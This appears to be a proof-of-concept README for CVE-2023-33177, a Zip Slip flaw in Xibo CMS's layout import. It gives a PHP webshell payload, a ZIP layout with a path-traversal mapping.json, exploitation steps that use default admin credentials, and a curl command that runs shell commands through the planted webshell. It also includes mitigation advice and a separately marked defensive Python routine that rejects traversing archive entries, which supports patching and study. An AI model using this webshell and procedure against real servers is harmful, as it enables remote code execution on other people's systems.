
CVE-2023-33177 PoC — Xibo CMS vulnerable to Remote Code Execution through Zip Slip

Associated Vulnerability

Title: Xibo CMS vulnerable to Remote Code Execution through Zip Slip (CVE-2023-33177)

Description: Xibo is a content management system (CMS). A path traversal vulnerability exists in the Xibo CMS whereby a specially crafted zip file can be uploaded to the CMS via the layout import function by an authenticated user which would allow creation of files outside of the CMS library directory as the webserver user. This can be used to upload a PHP webshell inside the web root directory and achieve remote code execution as the webserver user. Users should upgrade to version 2.3.17 or 3.3.5, which fix this issue. Customers who host their CMS with Xibo Signage have already received an upgrade or patch to resolve this issue regardless of the CMS version that they are running.
Readme
# Xibo CMS Zip Slip RCE Exploit (CVE-2023-33177)

This exploit demonstrates a **path traversal vulnerability** in Xibo CMS (CVE-2023-33177) that allows remote code execution through malicious layout imports.

## Vulnerability Details

**CVE/Advisory:** CVE-2023-33177

**Affected Versions:**
- Xibo CMS 1.8.0 - 2.3.16
- Xibo CMS 3.0.0 - 3.3.4

**Vulnerability Type:** Path Traversal (Zip Slip)

**Impact:** Remote Code Execution (RCE)

### Technical Summary

Xibo CMS allows authenticated users to import layout files via ZIP archives. The import functionality fails to properly validate file paths in the `mapping.json` file, allowing an attacker to write files outside the intended library directory using path traversal sequences (`../../`).

## How the Exploit Works

1. **Creates a valid Xibo layout export structure** with required JSON files
2. **Injects path traversal in `mapping.json`**: Uses `../../web/shell.php` as the file path
3. **Places webshell in traversed path** within the ZIP structure at `library/../../web/shell.php`
4. **Xibo extracts without validation**: Resolves to `/var/www/cms/web/shell.php`
5. **Achieves RCE**: Webshell is accessible at the web root

### The Vulnerability Chain

```
Zip contains: library/../../web/shell.php
Xibo reads:   library/ + ../../web/shell.php (from mapping.json)
Xibo writes:  /var/www/cms/library/temp/ + ../../web/shell.php
Result:       /var/www/cms/web/shell.php ← Webshell in web root!
```

## Usage

### Generate the Exploit

```bash
python3 create_exploit.py
```

This creates `exploit.zip` containing the malicious layout package.

### Exploitation Steps

1. **Access Xibo CMS** and log in with credentials (default: `xibo_admin` / `password`)
2. **Navigate to Import**: Design → Layouts → Import
3. **Upload `exploit.zip`**
4. **Ignore any JSON errors** - the webshell has already been written to disk
5. **Execute commands via webshell**:
   ```bash
   curl 'http://localhost:8080/shell.php?cmd=id'
   ```

## File Structure

The exploit ZIP contains:

```
exploit.zip
├── layout.json          # Valid Xibo layout definition
├── playlist.json        # Empty playlist (triggers JSON import)
├── mapping.json         # Contains path traversal payload
└── library/
    └── ../../web/
        └── shell.php    # PHP webshell (gets extracted to web root)
```

## Webshell Functionality

The embedded webshell is minimal:

```php
<?php system($_GET["cmd"]); ?>
```

Access it via: `http://<target>/shell.php?cmd=<command>`

## Mitigation

**Patched Versions:**
- Upgrade to Xibo CMS 2.3.17+ (for 2.x branch)
- Upgrade to Xibo CMS 3.3.5+ (for 3.x branch)

**Mitigation Strategies:**
1. Validate all file paths in ZIP archives before extraction
2. Reject paths containing `..` or absolute paths
3. Use secure extraction methods that prevent directory traversal
4. Implement proper input validation on import functionality
5. Restrict file upload permissions to authenticated, authorized users only
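Strategies 1 to 3 as one concrete pre-extraction check, added here as an example that is not part of this PoC or of Xibo's own code base: every archive entry and every string value inside `mapping.json` must still resolve beneath the extraction root after normalisation, otherwise the import is rejected before anything touches disk. The root path `LIBRARY_ROOT`, the schema-agnostic treatment of `mapping.json` and the sample archive are assumptions constructed for the demonstration.

```python
import io
import json
import posixpath
import zipfile

# Assumption: the directory the CMS extracts an import into (path taken from the chain above).
LIBRARY_ROOT = "/var/www/cms/library/temp"

def is_contained(root, relative):
    """True only if root/relative, after normalisation, still lies under root."""
    relative = relative.replace("\\", "/")          # treat backslashes as separators too
    if not relative or relative.startswith("/"):    # empty or absolute path: reject
        return False
    root = posixpath.normpath(root)
    target = posixpath.normpath(posixpath.join(root, relative))
    return target == root or target.startswith(root + "/")

def _strings(node):
    """Yield every string value in a parsed JSON document (schema-agnostic)."""
    if isinstance(node, str):
        yield node
    elif isinstance(node, dict):
        yield from (s for v in node.values() for s in _strings(v))
    elif isinstance(node, list):
        yield from (s for v in node for s in _strings(v))

def find_unsafe_paths(zip_bytes, root=LIBRARY_ROOT):
    """Return (kind, path) pairs for zip entries and mapping.json values that escape root."""
    unsafe = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():                  # check names as stored, not as extracted
            if not is_contained(root, info.filename):
                unsafe.append(("entry", info.filename))
        if "mapping.json" in zf.namelist():
            # Assumption: mapping.json is JSON; every string value is validated as a path.
            for value in _strings(json.loads(zf.read("mapping.json"))):
                if not is_contained(root, value):
                    unsafe.append(("mapping", value))
    return unsafe

def build_sample_zip():
    """Constructed archive mirroring the structure described above; contents are placeholders."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("layout.json", "{}")
        zf.writestr("mapping.json", json.dumps([{"file": "logo.png"}, {"file": "../../web/shell.php"}]))
        zf.writestr("library/logo.png", "placeholder")
        zf.writestr("library/../../web/shell.php", "placeholder, not a payload")
    return buf.getvalue()
```

An importer should call `find_unsafe_paths` on the uploaded bytes and abort the whole import if the list is non-empty, rather than skipping the offending entries and continuing.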

## Legal & Ethical Notice

This exploit is provided for:
- Educational purposes
- CTF competitions
- Authorized security testing
- Defensive security research

**Do not use this exploit against systems you do not own or have explicit permission to test.**

## References

- **Advisory:** GHSA-jj27-x85q-crqv
- **Xibo CMS:** https://xibo.org.uk/
- **Zip Slip Vulnerability:** https://security.snyk.io/research/zip-slip-vulnerability
- **CVE-2023-33177:** https://nvd.nist.gov/vuln/detail/CVE-2023-33177


## Author

complexusprada
November 2025
File Snapshot

/data/pocs/a231b02c48060249881f252508ab6021ed78a3fd
├── [2.9K] create_exploit.py
└── [3.5K] README.md